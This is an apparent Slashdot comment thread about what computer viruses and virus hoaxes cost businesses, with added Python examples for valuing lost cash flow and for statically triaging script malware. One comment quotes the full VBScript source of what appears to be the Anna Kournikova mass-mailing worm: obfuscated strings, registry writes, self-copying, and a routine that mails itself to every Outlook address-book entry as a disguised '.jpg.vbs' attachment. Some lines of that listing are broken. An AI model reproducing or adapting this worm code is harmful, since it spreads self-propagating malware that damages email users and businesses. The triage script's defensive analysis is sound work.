Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.
Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.
(If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)
Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.
Computing the PROVABLE direct loss is another story entirely.
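The procedure in the comment above, written out as a calculation. This is an added example, not part of the original post; the revenue curve, demand factor and interest rate are constructed assumptions, and the function names are hypothetical.

```python
def present_value(flows, daily_rate):
    """Deposit needed today to pay out flows[t] on day t at a daily interest rate."""
    return sum(f / (1.0 + daily_rate) ** t for t, f in enumerate(flows))


def hit_scenario(baseline, delay_days, demand_factor):
    """Shift the revenue curve right by the delay, then lower it.

    The series is cut off on the day the un-hit company folds, which is
    where the comment says the account should reach zero.
    """
    shifted = [0.0] * delay_days + list(baseline)
    return [f * demand_factor for f in shifted[:len(baseline)]]


def opportunity_cost(baseline, delay_days, demand_factor, daily_rate):
    """Present value of the cash flow the company did not get because of the hit."""
    hit = hit_scenario(baseline, delay_days, demand_factor)
    # Signed gap: days where the hit company earns more act as deposits.
    gap = [b - h for b, h in zip(baseline, hit)]
    return present_value(gap, daily_rate)


# Constructed curve: 30-day ramp to 3000/day, plateau, then a 60-day decline.
BASELINE = (
    [3000.0 * d / 30 for d in range(1, 31)]
    + [3000.0] * 210
    + [3000.0 * (60 - d) / 60 for d in range(1, 61)]
)

if __name__ == "__main__":
    # One-day slip, 2% lasting demand loss, about 6% annual interest.
    cost = opportunity_cost(BASELINE, delay_days=1, demand_factor=0.98,
                            daily_rate=0.06 / 365)
    print(f"opportunity cost of a one-day slip: {cost:,.0f}")
```

Both futures are guesses, as the comment says, so the output is only as good as the two curves fed in.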
Re:How much do virus *myths* cost businesses? (Score:4)
OnTheFly Source (Score:4)
<BLOCKQUOTE>
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFold
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have,
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
</BLOCKQUOTE>
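A static triage sketch for two traits visible in the listing above: a string hidden as a `Chr()` chain and the `.jpg.vbs` attachment name. This is an added example, not part of the original post; it reads three quoted lines as plain text and never executes them, and the extension lists and function names are assumptions.

```python
import re

# Three lines quoted from the listing above, handled as inert text (never executed).
SAMPLE = r'''
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set D23OvxM6KRH = CreateObject("Outlook.Application")
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
'''

# Assumed lists for illustration; tune them to your mail gateway policy.
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "exe", "scr", "pif", "bat", "cmd", "com"}
DECOY_EXTS = {"jpg", "jpeg", "gif", "png", "bmp", "txt", "doc", "pdf", "mp3", "avi"}

CHR_CALL = r'chr\(\s*(\d+)\s*\)'
CHR_CHAIN = re.compile(r'chr\(\s*\d+\s*\)(?:\s*&\s*chr\(\s*\d+\s*\))+', re.I)
CREATE_OBJECT = re.compile(r'createobject\(\s*"([^"]+)"\s*\)', re.I)
QUOTED = re.compile(r'"([^"\r\n]*)"')


def decode_chr_chains(source):
    """Return the plaintext of every Chr(n) & Chr(n) ... run in the script text."""
    decoded = []
    for chain in CHR_CHAIN.finditer(source):
        codes = re.findall(CHR_CALL, chain.group(0), re.I)
        decoded.append("".join(chr(int(c)) for c in codes if int(c) < 0x110000))
    return decoded


def is_deceptive_name(name):
    """True when a script/executable extension hides behind a harmless-looking one."""
    parts = name.strip().lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] in SCRIPT_EXTS and parts[1] in DECOY_EXTS


def triage(source):
    """Collect static indicators from a script without running it."""
    names = [q.rsplit("\\", 1)[-1] for q in QUOTED.findall(source)]
    return {
        "decoded_strings": decode_chr_chains(source),
        "com_objects": CREATE_OBJECT.findall(source),
        "deceptive_names": [n for n in names if is_deceptive_name(n)],
    }


if __name__ == "__main__":
    for key, values in triage(SAMPLE).items():
        print(key, values)
```

Matching on the decoded string rather than on the raw `Chr()` sequence keeps a rule stable when only the obfuscated spelling changes.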
It can cost a lot... (Score:5)
Take today for example..that big new scary
As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.
If you're not blocking
Virus cost: (Score:5)
How much do virus *myths* cost businesses? (Score:5)
As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.
argh! [ridiculopathy.com]